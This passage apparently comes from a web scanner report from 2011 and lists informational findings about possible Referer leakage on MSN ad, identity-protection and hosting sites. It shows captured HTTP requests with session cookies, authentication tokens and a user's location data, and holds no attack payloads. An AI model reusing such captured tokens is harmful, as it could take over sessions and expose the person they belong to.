Pragma: no-cache
Cteonnt-Length: 2419
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8463121-T20670727-C3000000000037380
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 24 Apr 2011 15:57:52 GMT
Content-Length: 2419


//<![CDATA[
function getRADIds() { return{"adid":"3000000000037380","pid":"8463121","targetid":"20670727"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1629620289() {var adCode_1629620289=new Array();adCode_1629620289.push('<iframe src="http://view.atdmt.com/MRT/iview/306111660/direct;;wi.300;hi.250/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">\n');adCode_1629620289.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_1629620289.push('document.write(\'<a href="http://clk.atdmt.com/MRT/go/306111660/direct;;wi.300;hi.250/01/" target="_blank"><img src="http://view.atdmt.com/MRT/view/306111660/direct;;wi.300;hi.250/01/"/></a>
...[SNIP]...

23.489. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=CMS3DA&AP=1089 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 849
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8616454-T20670702-C84000000000043582
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 24 Apr 2011 15:59:00 GMT
Content-Length: 849


//<![CDATA[
function getRADIds() { return{"adid":"84000000000043582","pid":"8616454","targetid":"20670702"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);}

...[SNIP]...
<a href="http://g.msn.com/2AD0004D/84000000000043582.1??PID=8616454&amp;UIT=G&amp;TargetID=20670702&amp;AN=1528842259&amp;PG=CMS3DA&amp;ASID=22c4e0ff239a4c71ae644410e0535bb9" target="_blank"><img src="http://ads2.msads.net/CIS/36/000/000/000/015/004.gif" width="300" height="250" alt="Ad - LearnDevNow" border="0" /></a>
...[SNIP]...

23.490. https://secure.identityguard.com/EnrollmentStep1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /EnrollmentStep1

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /EnrollmentStep1?storeId=10051&MID=44929 HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: http://www.identityguard.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; JSESSIONID=0000q-nYx1Keu7bJfsO0pBizt3b:14glhsrp2

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:01:06 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002779999=100000002779999%2cJUzxOb61NxaLz%2bgbZ1Ro3ggcxR4%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_100000002779999=100000002779999%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvYV5lF81xxnGdIw%2bl67KlnwpiaV4dm5kxr6RupgpYiYzej4qMfr2800fXVLG6wog7P5%0aK21Gyauwu09mpmZhZ4vP36C00p317MJMJzNFxLjHfFcZX48t8T07DRFWuTmeY%2bqHjX9%2bVZQs5rb%2f%0aTds7a7PW; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 77221


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- Start of JSTLEnvironmentSetup.jspf -->



...[SNIP]...
<!--- Begin AOL leadback pixel ---><img src="https://secure.leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=intersct_cs=1&betq=3000=372741" width="1" height="1" alt="" /><!--- End AOL leadback pixel --->
...[SNIP]...
<!-- 84807_1 The following Coding is for the Advertising.com Web Beacon --><img src="https://secure.ace-tag.advertising.com/action/type=396190828/bins=1/rich=0/mnum=1516/logs=0" height=1 width=1 border=0><!-- The preceding Coding is for the Advertising.com Web Beacon -->
...[SNIP]...
<map name="Map" id="Map">
                <area shape="rect" coords="10,2,73,35" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=www.identityguard.com&amp;lang=en" target="_blank" rel="assurance_popup" alt="Verisign" />
                <area shape="rect" coords="10,55,79,79" href="http://dc-easternpa.bbb.org/codbrep.html?wlcl=y&id=6282" target="_blank" rel="assurance_popup" alt="BBB BBB Online" />
...[SNIP]...
</a>
               <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=www.identityguard.com&amp;lang=en" target="_blank" rel="assurance_popup">
                   <img alt="VeriSign Secured" src="/wcsstore/ICD/images/streamlined/sassu_verisign.gif"/>
...[SNIP]...

23.491. https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/EnrollmentStep1

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=58&mktp=Next&cenhp1=1&hid=205561061&c1=CD76&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRuhiTmGlNQlKR0CJE8wZVQkY%0Ay2Jx5sZm2%2Bc1nEEXBnYuQQ3BWvtpmM6coDK2OOHmKwKxClJA89ePCaUt39rN8VuwBucOvrx%2B9TkJ%0A6crEVWo0rY%2FXGTgGduabk5azXxfx8Q%3D%3D&ddkey=https:EnrollmentStep1 HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le33/letp30daysfree33.html?mktp=Next&hid=205561061&campid=58&utm_medium=affiliates&c1=CD76&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmz=242046173.1303674405.2.2.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303674405.2; __utmc=242046173; 90226925_clogin=l=1303677758&v=1&e=1303678665607; JSESSIONID=0000wPJKOM2faxQEMOgWVQGYGFL:14evsnbg9; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_100000002779144=100000002779144%2cp%2bTJYWOSpX53Na2dlt3dXJy8rgI%3d; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_100000002779144=100000002779144%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvbynCOuRMhX0Qg%2fRtWqXptwJYxsfBIC7mDkMrD7Q%2fPHHpEPA4KptgUw8CfuxDI58%2fp8%0aX1NsbHrmlR4sffsd6NyULMmTZyq1kPBkTcK27A9kvvK9a0Cfnz2E3RALUKhU%2bWnea9K3YCddqHXY%0ajpJZfQPy

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:43:32 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 77289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- Start of JSTLEnvironmentSetup.jspf -->



...[SNIP]...
<!--- Begin AOL leadback pixel ---><img src="https://secure.leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=intersct_cs=1&betq=3000=372741" width="1" height="1" alt="" /><!--- End AOL leadback pixel --->
...[SNIP]...
<!-- 84807_1 The following Coding is for the Advertising.com Web Beacon --><img src="https://secure.ace-tag.advertising.com/action/type=396190828/bins=1/rich=0/mnum=1516/logs=0" height=1 width=1 border=0><!-- The preceding Coding is for the Advertising.com Web Beacon -->
...[SNIP]...
<map name="Map" id="Map">
                <area shape="rect" coords="10,2,73,35" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=www.identityguard.com&amp;lang=en" target="_blank" rel="assurance_popup" alt="Verisign" />
                <area shape="rect" coords="10,55,79,79" href="http://dc-easternpa.bbb.org/codbrep.html?wlcl=y&id=6282" target="_blank" rel="assurance_popup" alt="BBB BBB Online" />
...[SNIP]...
</a>
               <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=www.identityguard.com&amp;lang=en" target="_blank" rel="assurance_popup">
                   <img alt="VeriSign Secured" src="/wcsstore/ICD/images/streamlined/sassu_verisign.gif"/>
...[SNIP]...

23.492. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout?langId=-1&storeId=10051&catalogId=&ddkey=https:Logoff HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; WC_SESSION_ESTABLISHED=true; cmTPSet=Y; 90226925_clogin=l=1303614597&v=1&e=1303615926175; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26null%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:32:53 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 8623


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- Start of JSTLEnvironmentSetup.jspf -->



...[SNIP]...
</a>
               <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=www.identityguard.com&amp;lang=en" target="_blank" rel="assurance_popup">
                   <img alt="VeriSign Secured" src="/wcsstore/ICD/images/streamlined/sassu_verisign.gif"/>
...[SNIP]...

23.493. https://secure.krypt.com/cart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /cart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cart/?customize HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
Referer: http://krypt.com/dedicated/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 16:39:20 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:39:24 GMT; path=/; domain=.krypt.com
Location: /order/customize.html?index=2
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 20084


<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - View Ca
...[SNIP]...
<!-- Start Javascript -->
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript" ></script>
   <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.9/jquery-ui.min.js" type="text/javascript" ></script>
...[SNIP]...

23.494. https://secure.krypt.com/order/customize.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /order/customize.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /order/customize.html?index=1 HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:38:20 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:38:28 GMT; path=/; domain=.krypt.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 48123

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Customiz
...[SNIP]...
<!-- Start Javascript -->
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript" ></script>
   <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.9/jquery-ui.min.js" type="text/javascript" ></script>
...[SNIP]...

23.495. https://secure.lifelock.com/enrollment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /enrollment

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /enrollment?promocode=next&uid=945440258CD1 HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:10:01 GMT
Set-Cookie: promoCode=NEXT; Expires=Mon, 25-Apr-2011 03:10:01 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:25:01 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461; Path=/
Vary: Accept-Encoding
Content-Length: 22664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LifeLock.com - E
...[SNIP]...
<![endif]-->
   
   <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
<div class="verisign">
                   <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=secure.lifelock.com&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...
<!-- start of keywordmax pixel -->
   <script language="JavaScript" type="text/javascript" defer="1" src="https://keywordmax.com/tracking/show.php?id=661075270&location=Homepage"></script>
   <noscript>
       <img src="https://keywordmax.com/tracking/log.php?id=661075270&loc=Homepage" border="0" width="1" height="1">
   </noscript>
...[SNIP]...
<noscript>
       <iframe src="https://view.atdmt.com/iaction/LifeLock_Landing_Secure" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
   </noscript>
   
   <script type="text/javascript" src="https://www.upsellit.com/upsellitJS4.jsp?qs=219200253218308279346322312294346330342296304274294273324291&siteID=1353"></script>

   <script type="text/javascript" src="https://www.upsellit.com/cookie.jsp?value=seenSession&maxAge=86400&siteID=1353"></script>
...[SNIP]...

23.496. http://smartcompanygrowth.com/bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smartcompanygrowth.com
Path:   /bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/?gclid=CObW5ui1tqgCFUff4Aod4lhLCg HTTP/1.1
Host: smartcompanygrowth.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:40:13 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://smartcompanygrowth.com/xmlrpc.php
Set-Cookie: PHPSESSID=56b30beb6b215f9bb9cb2ca1888fedb3; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 64437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">

<!--
...[SNIP]...
</strong>, which by the way has its own URL (see <a href="http://www.ihatebestbuy.com/testimonials.html">http://www.ihatebestbuy.com/testimonials.html</a>
...[SNIP]...
<input type='image' name='submit' border='0' src='https://www.paypal.com/en_US/i/btn/btn_buynow_LG.gif' alt='PayPal - The safer, easier way to pay online' />
               <img alt='' border='0' width='1' height='1' src='https://www.paypal.com/en_US/i/scr/pixel.gif' />
           </form>
...[SNIP]...
<input type='image' name='submit' border='0' src='https://www.paypal.com/en_US/i/btn/btn_buynow_LG.gif' alt='PayPal - The safer, easier way to pay online' />
               <img alt='' border='0' width='1' height='1' src='https://www.paypal.com/en_US/i/scr/pixel.gif' />
           </form>
...[SNIP]...
<input type='image' name='submit' border='0' src='https://www.paypal.com/en_US/i/btn/btn_buynow_LG.gif' alt='PayPal - The safer, easier way to pay online' />
               <img alt='' border='0' width='1' height='1' src='https://www.paypal.com/en_US/i/scr/pixel.gif' />
           </form>
...[SNIP]...
<div id = 'groupSocialButtons'>


<a href = 'http://facebook.com/pages/Smart-Company-Growth/189449914398890' target = '_blank'>
<img src = 'http://smartcompanygrowth.com/wp-content/uploads/2011/01/FaceBook-Logo.png' class = 'imgGroupSocialButtons' />
...[SNIP]...
</a>

<a href = 'http://twitter.com/KarlWalinskas' target = '_blank'>
<img src = 'http://smartcompanygrowth.com/wp-content/uploads/2011/01/twitter_logo.jpg' class = 'imgGroupSocialButtons' />
...[SNIP]...
</a>

<a href = 'http://www.linkedin.com/in/karlwalinskas' target = '_blank'>
<img src = 'http://smartcompanygrowth.com/wp-content/uploads/2011/01/linkedin_logo_002.png' class = 'imgGroupSocialButtons' />
...[SNIP]...
</a>

<a href = 'http://www.youtube.com/user/kwalinskas' class = 'noLightbox' target = '_blank'>
<img src = 'http://smartcompanygrowth.com/wp-content/uploads/2011/01/youtube_icon_007.png' class = 'imgGroupSocialButtons' />
...[SNIP]...
<div id="dfrads-widget-7" class="box_small box widget dfrads"><a href="http://www.jdoqocy.com/click-4535786-10656374" target="_blank">
<img src="http://www.ftjcfx.com/image-4535786-10656374" width="100%" alt="Yahoo! Web Hosting" border="0"/></a>
...[SNIP]...
<div id="dfrads-widget-6" class="box_small box widget dfrads"><a href="http://www.jdoqocy.com/click-4535786-10298072">
<img src="http://www.ftjcfx.com/image-4535786-10298072" width="100%" alt="" border="0"/></a>
...[SNIP]...
<div class="textwidget"><iframe src='http://polls.linkedin.com/vote/131808/nzkbm' marginheight='0' marginwidth='0' topmargin='0' leftmargin='0' allowtransparency='true' frameborder='0' height='250' scrolling='no' width='300' readonly='readonly'></iframe>
...[SNIP]...
</a> -
           <a href="http://www.yournetpass.com">
               Theme Modified and Maintained by YourNetPass.com
           </a>
...[SNIP]...
